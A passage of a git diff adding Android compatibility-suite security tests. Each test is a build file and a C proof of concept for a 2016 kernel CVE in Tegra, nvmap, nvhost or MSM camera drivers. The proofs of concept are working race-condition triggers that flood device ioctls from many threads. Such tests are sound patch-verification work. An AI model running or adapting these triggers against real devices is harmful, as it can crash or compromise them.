+ pthread_kill(keepon_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk
new file mode 100644
index 0000000..fd7fc21
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6736
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c
new file mode 100644
index 0000000..77f4b7a
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c
@@ -0,0 +1,174 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define SUBMIT_THREAD_NUM 900
+#define TRY_TIMES SUBMIT_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+
+int fd;
+pthread_t submit_thread_id[SUBMIT_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_submit submit_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* submit_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create submit thread */
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ ret = pthread_create(submit_thread_id + i, NULL, submit_thread, NULL);
+ if(ret){
+ goto out_submit_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set submit */
+ submit_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_submit_thread:
+ /* kill submit thread */
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_kill(submit_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk
new file mode 100644
index 0000000..bba13f3
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8412
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c
new file mode 100644
index 0000000..d438b40
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <signal.h>
+
+#define VIDIOC_MSM_ACTUATOR_CFG 0xc0d056c6
+#define MSM_SD_SHUTDOWN 0xc00856dd
+
+int fd;
+
+
+int main() {
+ long i;
+ int pid;
+ pthread_t th[6];
+ int argn[50] = {0};
+
+ fd = open("/dev/v4l-subdev7", 0x0ul );
+
+
+ argn[0] = 7;
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+
+ pid = fork();
+ if(!pid){
+ argn[0] = 1;
+ while(1){
+ usleep(10);
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+ }
+ }
+ i = 0;
+ while(1){
+ i++;
+ argn[0] = 7;
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+
+ usleep(100);
+
+ argn[0] = 0;
+ syscall(__NR_ioctl, fd, MSM_SD_SHUTDOWN, argn, 0, 0, 0);
+
+ }
+
+ close(fd);
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk
new file mode 100644
index 0000000..5ff169b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8424
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c
new file mode 100644
index 0000000..4460b88
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c
@@ -0,0 +1,138 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void trigger_nvmap_create() {
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+ //printf("[*] NVMAP_IOC_CREATE, fd(%d), last error = %d\n", g_allocation->handle, errno);
+}
+
+void trigger_nvmap_free() {
+ static int data = 1024;
+ ioctl(g_fd, NVMAP_IOC_FREE, data);
+ //printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+ printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+ }
+}
+
+void prepare_data() {
+ void* data = calloc(1, 0x1000);
+
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 1024;
+
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+}
+static int init = 0;
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(0, 2);
+
+ int i;
+ while (1) {
+ if (init == 0) {
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ init = 1;
+ }
+ trigger_nvmap_free();
+ }
+}
+
+int main(int argc, char**argv) {
+ setup_privi_and_affinity(0, 1);
+ if (open_driver() < 0) {
+ return -1;
+ }
+ prepare_data();
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ sleep(1);
+ while (1) {
+ if (init == 0)
+ pthread_cond_signal(&cond);
+ trigger_nvmap_create();
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk
new file mode 100644
index 0000000..e984812
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8425
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c
new file mode 100644
index 0000000..498bca4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c
@@ -0,0 +1,140 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/nvhost-vic"
+
+struct nvhost_channel_open_args {
+ __s32 channel_fd;
+};
+
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN \
+ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+pthread_t toggle_thread_id;
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ return;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ usleep(200);
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvhost_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ printf("[+] open OK\n");
+ }
+
+ #if 1
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ /* open */
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk
new file mode 100644
index 0000000..a134d9c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8426
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c
new file mode 100644
index 0000000..c423416
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c
@@ -0,0 +1,147 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/nvhost-gpu"
+
+struct nvhost_channel_open_args {
+ __s32 channel_fd;
+};
+
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN \
+ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+pthread_t toggle_thread_id;
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ return;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ usleep(200);
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvhost_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ printf("[+] open OK\n");
+ }
+
+ #if 1
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ printf("[+] create close thread %d failed %d %s\n", i, errno, strerror(errno));
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ printf("[+] %03d times\n", i);
+ /* open */
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+ usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk
new file mode 100644
index 0000000..131f240
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8427
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
